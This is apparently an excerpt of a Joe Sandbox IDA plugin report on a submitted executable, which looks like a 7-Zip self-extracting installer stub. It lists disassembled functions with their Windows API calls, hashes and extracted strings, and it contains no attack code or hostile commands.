                                                            • Instruction ID: b1ff7c23223d170b9333fa97acec74f2c9230ee3eabfe87d0be763292bfdf634
                                                            • Opcode Fuzzy Hash: 25d202db14ae47cc7765131eef640a3ba3c2163a3dcc7105130798770ded3a1b
                                                            • Instruction Fuzzy Hash: 8E210C7650021ABFCF01AFA8DD48DDF7F69FB08351F008565FA15E21A0C775EA209B64
                                                            Function 0040677A Relevance: 13.5, APIs: 9, Instructions: 47windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDlgItem.USER32(?,000004B3), ref: 0040678E
                                                            • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004067A1
                                                            • GetDlgItem.USER32(?,000004B4), ref: 004067AB
                                                            • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004067B3
                                                            • SendMessageW.USER32(?,00000401,?,00000000), ref: 004067C3
                                                            • GetDlgItem.USER32(?,?), ref: 004067CC
                                                            • SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 004067D4
                                                            • GetDlgItem.USER32(?,?), ref: 004067DD
                                                            • SetFocus.USER32(00000000,?,000004B4,77280E50,00407E06,000004B4,000004B3,00000000,000004B4,00000000,000004B2,?,000004B7), ref: 004067E0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: ItemMessageSend$Focus
                                                            • String ID:
                                                            • API String ID: 3946207451-0
                                                            • Opcode ID: ad16f172208785dca513fa64c118104ef693669a3ac6e088fd96c23032a45483
                                                            • Instruction ID: e7a8c5b21de344c7c4c5496bf688f1d5cc3ba414acf11b32f4788b893cc62525
                                                            • Opcode Fuzzy Hash: ad16f172208785dca513fa64c118104ef693669a3ac6e088fd96c23032a45483
                                                            • Instruction Fuzzy Hash: 6FF04F712403087BEA212B61DD86F5BBA6EEF81B45F018425F340650F0CBF7EC109A28
                                                            Function 0040C3D8 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 480COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,00000000), ref: 0040C603
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: ??3@
                                                            • String ID: IA$IA$IA$IA$IA$IA
                                                            • API String ID: 613200358-3743982587
                                                            • Opcode ID: 6e54149e8c3d77333b16b378dc95c38791a09178c73359331ff936fd258cd747
                                                            • Instruction ID: 4cebfcab61734def35128a955d6a3e34031d8899c11ca8f9bd2aeb72941b6852
                                                            • Opcode Fuzzy Hash: 6e54149e8c3d77333b16b378dc95c38791a09178c73359331ff936fd258cd747
                                                            • Instruction Fuzzy Hash: D2221671900248DFCB24EF65C8D09EEBBB5FF48304F50852EE91AA7291DB38A945CF58
                                                            Function 004083B6 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 196COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,00417788,00000000,SetEnvironment), ref: 00408479
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: ??3@
                                                            • String ID: BeginPrompt$ErrorTitle$FinishMessage$HelpText$SetEnvironment$WarningTitle
                                                            • API String ID: 613200358-994561823
                                                            • Opcode ID: 971dcdd12a827a4034ed94f9ba1d623efd1f14b2bcca4d73e06b44b648e667ed
                                                            • Instruction ID: 5566f9f9667118f06bc812855c9affabb63102f3a10b3971892d5eca1131561f
                                                            • Opcode Fuzzy Hash: 971dcdd12a827a4034ed94f9ba1d623efd1f14b2bcca4d73e06b44b648e667ed
                                                            • Instruction Fuzzy Hash: CA51D47080420AAACF24AB559E85AFB7774EB20348F54443FF881722E1EF7D5D82D64E
                                                            Function 00406DB2 Relevance: 12.1, APIs: 8, Instructions: 69COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memcpy.MSVCRT(?,00417410,00000160), ref: 00406DD1
                                                            • SystemParametersInfoW.USER32(00000029,00000000,?,00000000), ref: 00406DF0
                                                            • GetDC.USER32(00000000), ref: 00406DFB
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00406E07
                                                            • MulDiv.KERNEL32(?,00000048,00000000), ref: 00406E16
                                                            • ReleaseDC.USER32(00000000,?), ref: 00406E24
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00406E4C
                                                            • DialogBoxIndirectParamW.USER32(00000000,?,?,Function_0000667A), ref: 00406E81
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: CapsDeviceDialogHandleIndirectInfoModuleParamParametersReleaseSystemmemcpy
                                                            • String ID:
                                                            • API String ID: 2693764856-0
                                                            • Opcode ID: e70a94c77e8458ae7b0f85d98e5dff18e09bef3a98047e8bed90a0db42bf0d7e
                                                            • Instruction ID: b2c1943609947f3a034a1f42a4fd453b3666a2b5c4d4ccfd9a1c2059c5c1cb6f
                                                            • Opcode Fuzzy Hash: e70a94c77e8458ae7b0f85d98e5dff18e09bef3a98047e8bed90a0db42bf0d7e
                                                            • Instruction Fuzzy Hash: C32184B5500218BFDB215F61DC45EEB7B7CFB08746F0040B6F609A1190D7748E948B65
                                                            Function 0040695E Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDC.USER32(?), ref: 0040696E
                                                            • GetSystemMetrics.USER32(0000000B), ref: 0040698A
                                                            • GetSystemMetrics.USER32(0000003D), ref: 00406993
                                                            • GetSystemMetrics.USER32(0000003E), ref: 0040699B
                                                            • SelectObject.GDI32(?,?), ref: 004069B8
                                                            • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 004069D3
                                                            • SelectObject.GDI32(?,?), ref: 004069F9
                                                            • ReleaseDC.USER32(?,?), ref: 00406A08
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: MetricsSystem$ObjectSelect$DrawReleaseText
                                                            • String ID:
                                                            • API String ID: 2466489532-0
                                                            • Opcode ID: 3371c90df87af61a96ab0a4f5adfc31794890a389d4733c3cd0e84d47817aa4d
                                                            • Instruction ID: 7c755332e1b278278a0584394201b19561512224090c74d51841a9ad660c27ee
                                                            • Opcode Fuzzy Hash: 3371c90df87af61a96ab0a4f5adfc31794890a389d4733c3cd0e84d47817aa4d
                                                            • Instruction Fuzzy Hash: 6B216871900209EFCB119F65DD84A8EBFF4EF08321F10C46AE559A72A0C7359A50DF40
                                                            Function 0040408B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 96stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlenW.KERNEL32(hAA,00000020,?,?,00405838,?,?,?,00000000,?), ref: 004040A4
                                                              • Part of subcall function 00401A85: CharUpperW.USER32(?,7727E0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
                                                              • Part of subcall function 00401A85: CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00404156
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 0040415E
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 0040416D
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00404175
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: ??3@$CharUpper$lstrlen
                                                            • String ID: hAA
                                                            • API String ID: 2587799592-1362906312
                                                            • Opcode ID: b8720cb8756f8e9e8094298d34df6b31f2892d9def23642e2fc1977912460d31
                                                            • Instruction ID: 7f7e13310b21401de90169bcc26cd057e2afddf23eedd5de54135d69024cf91c
                                                            • Opcode Fuzzy Hash: b8720cb8756f8e9e8094298d34df6b31f2892d9def23642e2fc1977912460d31
                                                            • Instruction Fuzzy Hash: D7212772D40215AACF20ABA4CC46AEB77B9DF90354F10407BEB41BB2E1E7789D848658
                                                            Function 00404CBC Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 92COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000001,00000000,00000000,00000001,?,00000000), ref: 00404D3E
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,004054CC,?,;!@InstallEnd@!,004054CC,;!@Install@!UTF-8!,00417400,00000000,00000001,?,00000000), ref: 00404DA0
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,004054CC,?,;!@InstallEnd@!,004054CC,;!@Install@!UTF-8!,00417400,00000000,00000001,?,00000000), ref: 00404DB8
                                                              • Part of subcall function 00403354: lstrlenW.KERNEL32(00404AC6,?,?,00000000,?,?,?,?,00404AC6,?), ref: 00403361
                                                              • Part of subcall function 00403354: GetSystemTimeAsFileTime.KERNEL32(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 004033D7
                                                              • Part of subcall function 00403354: GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004033DE
                                                              • Part of subcall function 00403354: ??3@YAXPAX@Z.MSVCRT(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 0040349D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: ??3@$FileTime$AttributesSystemlstrlen
                                                            • String ID: 03A$;!@Install@!UTF-8!$;!@InstallEnd@!
                                                            • API String ID: 4038993085-2279431206
                                                            • Opcode ID: 1e5f1ef11ab3d9e84330ff60a8d60345b5fdf25d940142a54a900a3d947b53ea
                                                            • Instruction ID: 637b7b13a9bcd1d52ea1019587bfa2fb4435f6835f564ae220b3123002230846
                                                            • Opcode Fuzzy Hash: 1e5f1ef11ab3d9e84330ff60a8d60345b5fdf25d940142a54a900a3d947b53ea
                                                            • Instruction Fuzzy Hash: CE312D71D0021EEACF05EF92CD429EEBBB4BF44318F10042BE911762E1DB785649DB98
                                                            Function 0040755F Relevance: 10.6, APIs: 7, Instructions: 63timethreadinjectionCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EndDialog.USER32(?,00000000), ref: 00407579
                                                            • KillTimer.USER32(?,00000001), ref: 0040758A
                                                            • SetTimer.USER32(?,00000001,00000000,00000000), ref: 004075B4
                                                            • SuspendThread.KERNEL32(0000026C), ref: 004075CD
                                                            • ResumeThread.KERNEL32(0000026C), ref: 004075EA
                                                            • EndDialog.USER32(?,00000000), ref: 0040760C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: DialogThreadTimer$KillResumeSuspend
                                                            • String ID:
                                                            • API String ID: 4151135813-0
                                                            • Opcode ID: fa37b7d0569be928e5d0aecc9653dabfd5de706af621d680b5378aa8e85f3b57
                                                            • Instruction ID: ebb94c5c4675b2e6542c2b2cb7d5652cccd5624f9a00d71f737e39ca63bd9789
                                                            • Opcode Fuzzy Hash: fa37b7d0569be928e5d0aecc9653dabfd5de706af621d680b5378aa8e85f3b57
                                                            • Instruction Fuzzy Hash: 9811BF70A08618BBD7212F15EE849E77BBDFB00756B00843AF523A05A0CB39BD00DA1D
                                                            Function 00404E3F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 60COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,00000025,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404E85
                                                              • Part of subcall function 00404343: ??3@YAXPAX@Z.MSVCRT(?,?,?,004177C4,004177C4,?,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 004043B6
                                                            • ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,00000025,004177C4,004177C4,00000000,00000025,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404EAB
                                                            • wsprintfA.USER32 ref: 00404EBC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: ??3@$wsprintf
                                                            • String ID: :Language:%u!$;!@Install@!UTF-8!$;!@InstallEnd@!
                                                            • API String ID: 2704270482-1550708412
                                                            • Opcode ID: b3a647dc230e6375ba5304378dede3f86871d19815b7720c308d82744c7d9f3d
                                                            • Instruction ID: afe26c372a183c0ca4a1b7edc16cb7be903c3e4040aad79e05e22cec791dc9d0
                                                            • Opcode Fuzzy Hash: b3a647dc230e6375ba5304378dede3f86871d19815b7720c308d82744c7d9f3d
                                                            • Instruction Fuzzy Hash: D8115E71B00018BBCF00FB95CC42EFE77ADAB84705B10402EBA15E3182DB78AB028799
                                                            Function 00403880 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405,?,00000000,00000000,00000000), ref: 004038C6
                                                            • ??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405,?,00000000,00000000), ref: 00403904
                                                            • ??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405), ref: 0040392A
                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,00417788,00417788,00000000,00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788), ref: 00403932
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: ??3@
                                                            • String ID: %%T/$%%T\
                                                            • API String ID: 613200358-2679640699
                                                            • Opcode ID: 9eec194740abc4bee078c15c8dc217b66edb47652cee4dab90ed516c3b80c8f9
                                                            • Instruction ID: 53c9ca64f2466311d4136dbbff57d229d1af9e29f5fa76e56e45344ae10c91f3
                                                            • Opcode Fuzzy Hash: 9eec194740abc4bee078c15c8dc217b66edb47652cee4dab90ed516c3b80c8f9
                                                            • Instruction Fuzzy Hash: 5011DD3190410EBACF05FFA1D857CEDBB79AE00708F50806AB511760E1EF79A785DB98
                                                            Function 0040393B Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405,?,00000000,00000000,00000000), ref: 00403981
                                                            • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405,?,00000000,00000000), ref: 004039BF
                                                            • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405), ref: 004039E5
                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,00414784,00414784,00000000,00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784), ref: 004039ED
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: ??3@
                                                            • String ID: %%S/$%%S\
                                                            • API String ID: 613200358-358529586
                                                            • Opcode ID: c94d4b60668bfb9eedf3143ce332dc4c41685f87d495a97f985edcc2faf71bca
                                                            • Instruction ID: c240205f9e12946546b7747d8fd44f392230bc1153c6614d6b8016afa5fd7689
                                                            • Opcode Fuzzy Hash: c94d4b60668bfb9eedf3143ce332dc4c41685f87d495a97f985edcc2faf71bca
                                                            • Instruction Fuzzy Hash: 1D11AD3190410EBACF05FFA1D856CEDBB79AE00708F51806AB511760E1EF78A789DB98
                                                            Function 004039F6 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405,?,00000000,00000000,00000000), ref: 00403A3C
                                                            • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405,?,00000000,00000000), ref: 00403A7A
                                                            • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405), ref: 00403AA0
                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,00414784,00414784,00000000,00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784), ref: 00403AA8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: ??3@
                                                            • String ID: %%M/$%%M\
                                                            • API String ID: 613200358-4143866494
                                                            • Opcode ID: 3eb134fca1680c0093703720a533bafa1d2fd801437f3d80c27f205d784cf8f2
                                                            • Instruction ID: 5f6947e2f47a7d655e02fb84317d9747a35bc7200d49f7273ebe403b31479b31
                                                            • Opcode Fuzzy Hash: 3eb134fca1680c0093703720a533bafa1d2fd801437f3d80c27f205d784cf8f2
                                                            • Instruction Fuzzy Hash: C911AD3190410EBACF05FFA1D956CEDBB79AE00708F51806AB511760E1EF78A789DB58
                                                            Function 0040E456 Relevance: 10.5, APIs: 1, Strings: 6, Instructions: 42COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _CxxThrowException.MSVCRT(00000000,00414CFC), ref: 0040E4EE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: ExceptionThrow
                                                            • String ID: $JA$4JA$DJA$TJA$hJA$xJA
                                                            • API String ID: 432778473-803145960
                                                            • Opcode ID: 8cab838d89dd1577677f775eaf8cb930bb6d64206a7fe5cceb0cff601651d84b
                                                            • Instruction ID: 5492ea6659e041f1bcf420c4685f7038b08242b420f8f2c51a6428b2159ddc92
                                                            • Opcode Fuzzy Hash: 8cab838d89dd1577677f775eaf8cb930bb6d64206a7fe5cceb0cff601651d84b
                                                            • Instruction Fuzzy Hash: 7211A5F0541B419BC7308F16E544587FBF8AF907587218A1FD0AA9BA51D3F8A1888B9C
                                                            Function 0040C0DC Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 243COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0040BA46: ??2@YAPAXI@Z.MSVCRT(0000000C,?,0040C20C,004149B0,00000001,?,?,00000000), ref: 0040BA4B
                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,004149B0,00000001,?,?,00000000), ref: 0040C20D
                                                              • Part of subcall function 0040ADC3: ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
                                                              • Part of subcall function 0040ADC3: memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
                                                              • Part of subcall function 0040ADC3: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00
                                                            • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,004149B0,00000001,?,?,00000000), ref: 0040C245
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: ??2@$??3@$memmove
                                                            • String ID: IA$IA$IA
                                                            • API String ID: 4294387087-924693538
                                                            • Opcode ID: 3ef1446a3f9eae3cfdc2853b922aca3bc2f9cc2cd28dfb990552d7283ffc15f1
                                                            • Instruction ID: 38d37476858cbe2739f158cf8086d9562841ccd83740beefedbf55b6536d6dac
                                                            • Opcode Fuzzy Hash: 3ef1446a3f9eae3cfdc2853b922aca3bc2f9cc2cd28dfb990552d7283ffc15f1
                                                            • Instruction Fuzzy Hash: 20B1C1B1900209DFCB54EFAAC8819DEBBB5BF48304F50852EF919A7291DB38A945CF54
                                                            Function 00407B33 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDlgItem.USER32(?,000004B8), ref: 00407B8B
                                                            • SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00407B9D
                                                            • wsprintfW.USER32 ref: 00407BBB
                                                            • ??3@YAXPAX@Z.MSVCRT(?), ref: 00407C53
